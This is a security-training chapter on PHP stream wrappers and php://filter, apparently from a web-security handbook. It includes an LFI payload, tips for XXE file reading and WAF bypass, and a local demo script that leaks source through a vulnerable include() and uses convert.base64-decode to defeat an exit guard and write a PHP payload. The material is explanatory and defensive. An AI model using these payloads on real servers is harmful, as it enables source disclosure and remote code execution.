5.1.6. PHP Stream

5.1.6.1. Introduction

The concept of streams was introduced in PHP 4.3. A stream is an abstraction over streaming data that unifies operations on different data sources, such as file data, network data, and compressed data.

Streams are manipulated with the ordinary file functions, such as file, fopen, fwrite, fclose, file_get_contents, file_put_contents, etc.

5.1.6.2. Encapsulation Protocol

PHP comes with many built-in URL-style wrappers for filesystem functions like fopen(), copy(), file_exists(), and filesize(). Use stream_get_wrappers() to view the protocols supported by the running build; some of the wrappers below (ssh2://, rar://, ogg://, expect://) are provided by PECL extensions and are only present when those are installed.

  • file:// Accessing local filesystem

  • http:// Accessing HTTP(s) URLs

  • ftp:// Accessing FTP(s) URLs

  • php:// Accessing various I/O streams

  • zlib:// Compression Streams

  • data:// Data(RFC 2397)

  • glob:// Find pathnames matching pattern

  • phar:// PHP Archive

  • ssh2:// Secure Shell 2

  • rar:// RAR

  • ogg:// Audio stream

  • expect:// Process Interaction Streams

5.1.6.3. Support Streaming

PHP provides a number of input/output (I/O) streams that give access to the PHP process's own input and output streams (standard input, output and error descriptors), in-memory and disk-backed temporary file streams, and filters that can transform other readable and writable file resources.

Note that the php:// streams are not restricted by allow_url_fopen, but php://input, php://stdin, php://memory and php://temp are restricted by allow_url_include. The remaining php:// streams, php://filter in particular, can therefore be passed to include() even when allow_url_include is off.

5.1.6.3.1. Input and output streams

php://stdin, php://stdout and php://stderr allow direct access to the corresponding input or output stream of the PHP process. The stream references a duplicate of the file descriptor, so if you open php://stdin and then close it, you only close the duplicate; the actual STDIN being referenced is not affected.

php://stdin is read-only; php://stdout and php://stderr are write-only.

5.1.6.3.2. fd

php://fd allows direct access to the specified file descriptor. For example, php://fd/3 refers to file descriptor 3.

5.1.6.3.3. memory and temp

The streams php://memory and php://temp are read-write, allowing temporary data to be stored in a file-like wrapper. The difference between the two is that php://memory always stays in memory, whereas php://temp starts writing to a temporary file once its memory limit is reached. That limit can be set in bytes with php://temp/maxmemory:NN; the default is 2 MB.

5.1.6.3.4. input

php://input is a read-only stream that gives access to the raw request body. For POST requests, prefer php://input over $HTTP_RAW_POST_DATA, since it does not depend on specific php.ini directives; in cases where $HTTP_RAW_POST_DATA is not populated by default, php://input also potentially needs less memory than enabling always_populate_raw_post_data. ($HTTP_RAW_POST_DATA and always_populate_raw_post_data were removed in PHP 7.0.) php://input is not available for requests sent with enctype="multipart/form-data".

5.1.6.4. filter

php://filter is a meta-wrapper that applies one or more stream filters to another stream at the time it is opened. PHP ships a set of built-in filters, and custom filters registered with stream_filter_register() can be used as well.

The wrapper takes three parameters: resource, read, and write. resource is required and names the stream to be filtered; it must come last in the URL, because everything after resource= is taken as the target. read and write are optional; each takes one or more filter names separated by a pipe character (|) and applies them to the read chain or the write chain respectively. A filter list given without a read= or write= prefix is applied to both chains.
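The following script is an added example, not code from the original page. It exercises the read and write chain syntax just described, and uses php://temp (from the memory and temp section above) as the target of a write chain so that the transformed bytes are kept off disk. The sample file name and contents are constructed for the demo.

```php
<?php
// Added example (not from the original page): read and write filter chains on
// php://filter, with php://temp as a scratch stream. The one sample file and
// its contents are constructed here.

$path = tempnam(sys_get_temp_dir(), 'strm');
file_put_contents($path, "<?php echo 'hello'; ?>\n");

// read= chain: filters run left to right while the stream is read, so the
// file is upper-cased first and then base64-encoded.
$encoded = file_get_contents(
    'php://filter/read=string.toupper|convert.base64-encode/resource=' . $path
);
echo $encoded, "\n";
echo base64_decode($encoded);

// A filter list without a read= or write= prefix applies to both chains.
echo file_get_contents('php://filter/string.rot13/resource=' . $path);

// write= chain via stream_filter_append(): bytes are transformed before
// php://temp stores them. maxmemory:NN keeps up to NN bytes in RAM and spills
// the rest to a temporary file (the default limit is 2 MB).
$tmp = fopen('php://temp/maxmemory:1024', 'w+');
stream_filter_append($tmp, 'convert.base64-encode', STREAM_FILTER_WRITE);
fwrite($tmp, "secret payload!");   // 15 bytes: whole base64 groups, no padding
rewind($tmp);                      // seeking flushes the write chain
echo stream_get_contents($tmp), "\n";
fclose($tmp);

// The same write chain expressed in URL form, against a real file.
file_put_contents('php://filter/write=convert.base64-encode/resource=' . $path, 'x');
echo file_get_contents($path), "\n";

unlink($path);
```

Run it with the PHP CLI. The read chain is the form seen in LFI payloads; the write chain is what matters when an attacker controls the destination of a file write, since the filter runs on the bytes before they are stored.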

5.1.6.4.1. Filter List

Use stream_get_filters() to obtain the list of registered filters. The built-in filters in PHP are as follows:

  • string filter
    • string.rot13

    • string.toupper

    • string.tolower

    • string.strip_tags

  • conversion filter
    • convert.base64-encode

    • convert.base64-decode

    • convert.quoted-printable-encode

    • convert.quoted-printable-decode

    • convert.iconv.*

  • compression filter
    • zlib.deflate

    • zlib.inflate

    • bzip2.compress

    • bzip2.decompress

  • encryption filter (provided by the mcrypt extension, deprecated in PHP 7.1 and removed in PHP 7.2)
    • mcrypt.<ciphername>

    • mdecrypt.<ciphername>

5.1.6.4.2. Filter exploit tricks

  • LFI
    • php://filter/convert.base64-encode/resource=index.php

  • When a file is read through XXE, characters in it that are meaningful to the XML parser cause a parse error; wrapping the target in php://filter/convert.base64-encode/resource=... returns it as base64 text instead

  • convert.base64-decode silently drops bytes outside the base64 alphabet, which can be used to bypass some file-format checks (for example, a guard line written in front of attacker-controlled content loses all but its alphabet characters)

  • Some conversion filters consume a lot of resources and can be used for DoS

  • rot13 / convert filters can transform a payload so that it passes a WAF
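As an added example (not code from the original page), the script below runs two of the tricks listed above against a scratch directory: source disclosure through an include() sink with convert.base64-encode, and the stripping of non-alphabet bytes by a convert.base64-decode write chain. The directory, file names, secret and payload are all constructed for the demo; the hardened sink at the end is one possible fix, not the page's.

```php
<?php
// Added example (not from the original page): php://filter exploitation tricks
// run locally. Paths, the secret and the payload are constructed for the demo.

$dir = sys_get_temp_dir() . '/phpstream_' . getmypid();
mkdir($dir);
file_put_contents("$dir/config.php", "<?php \$db_pass = 'hunter2';\n");

// --- 1. Source disclosure through an include() sink ---------------------
// Vulnerable sink: the include target is attacker-controlled.
function vulnerable_include(string $page): void
{
    include $page;   // a plain path executes config.php and prints nothing
}

// With the filter wrapper the included "file" is base64 text with no PHP
// tags, so include() prints it instead of executing it. php://filter is not
// restricted by allow_url_include, which is why this works where http:// fails.
ob_start();
vulnerable_include("php://filter/convert.base64-encode/resource=$dir/config.php");
$leak = ob_get_clean();
echo base64_decode($leak);   // the source, secret included

// Hardened sink: user input selects a key from a fixed map, never a path.
function safe_include(string $page, array $allowed): void
{
    if (!isset($allowed[$page])) {
        http_response_code(404);
        return;
    }
    include $allowed[$page];
}

// --- 2. convert.base64-decode drops bytes outside the alphabet -----------
// A guard line prepended to attacker-written content stops execution when the
// file is included. After decoding, only its alphabet characters remain:
// "phpexit" (7 chars). One extra character realigns the stream to a 4-char
// boundary, so the payload that follows decodes intact, preceded by 6 junk bytes.
$guard   = "<?php exit; ?>";
$payload = base64_encode("<?php echo 'pwned'; ?>");
$fh = fopen("php://filter/write=convert.base64-decode/resource=$dir/shell.php", 'w');
fwrite($fh, $guard . 'a' . $payload);
fclose($fh);
$written = file_get_contents("$dir/shell.php");
echo bin2hex(substr($written, 0, 6)), ' ', substr($written, 6), "\n";

// Cleanup.
unlink("$dir/config.php");
unlink("$dir/shell.php");
rmdir($dir);
```

The first half shows why a path allowlist, not a string check on the input, is the right fix: the filter URL never needs ../ or a remote scheme. The second half is the same write-chain mechanism as any other php://filter/write= use; the only attacker requirement is control over the resource= part of a file-write destination.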